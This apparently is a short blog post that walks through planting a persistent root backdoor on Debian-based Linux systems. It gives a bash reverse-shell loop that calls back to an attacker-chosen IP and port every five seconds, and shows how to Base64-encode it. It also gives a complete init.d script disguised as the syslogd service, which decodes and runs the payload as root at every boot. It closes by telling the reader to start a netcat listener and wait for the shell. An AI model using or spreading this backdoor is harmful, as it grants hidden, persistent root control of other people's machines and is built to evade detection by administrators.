Skip to main content

Init.d root reverse Shell

· 2 min read
Strider

I took the liberty to play around with Bash a bit. What came out of it, a small reverse TCP shell, which runs as init.d script. The idea was the following: "What if you already have root rights on a system? You don't want to create a new user, which also has root rights, because it might be noticed. So what do you do? Of course you create a backdoor, which runs with root rights. And that's exactly what it is.

I have built a small Init.d script here, which implements this exactly, and thereby directly exploits the root rights at startup. Since every script with root privileges is executed during bootup, you can directly spawn a rootshell with this script. The most important thing here is the string encoded in Base64: "IyEvYmluL2Jhc2...". Normally it looks decoded like below.

#!/bin/bash
while true; do /bin/bash -i &> /dev/tcp/<yourip>/<port> 0>&1; sleep 5; done

What does it do exactly? An infintyloop is executed, which starts a bash shell. All input/output is forwarded to the address created in /dev/tcp/. By creating the address, a connection is established directly. This happens every 5 seconds.

The command, you can write in a seperate file, and then Base64 encoded read out again and ready is the string

$ cat payload | base64

We simply put this into the init.d script. If necessary we adjust some details, like the name of the service. Here in the case syslogd so that it is not so noticeable.

#! /bin/bash

### BEGIN INIT INFO
# Provides: syslogd
# Required-Start: $local_fs $network
# Required-Stop: $local_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: syslogd service
# Description: Run syslogd service
### END INIT INFO

case "$1" in
start)
echo "Starting syslogd..."
FILE="rsyslog"$(date +%s)".tmp"
echo "<base64 payload>" | base64 -d> /tmp/$FILE
/bin/bash /tmp/$FILE
;;
stop)
echo "Stopping syslogd..."
;;
*)
echo "Usage: /etc/init.d/syslogd {start|stop}"
exit 1
;;
esac

exit 0

Now just go out of the system. Start a NetCat listener and wait a short time.

After that, a shell should have arrived.

And off you go 😄

The whole thing has only been tested on Debian based systems so far.

I hope someone can do something with it 😄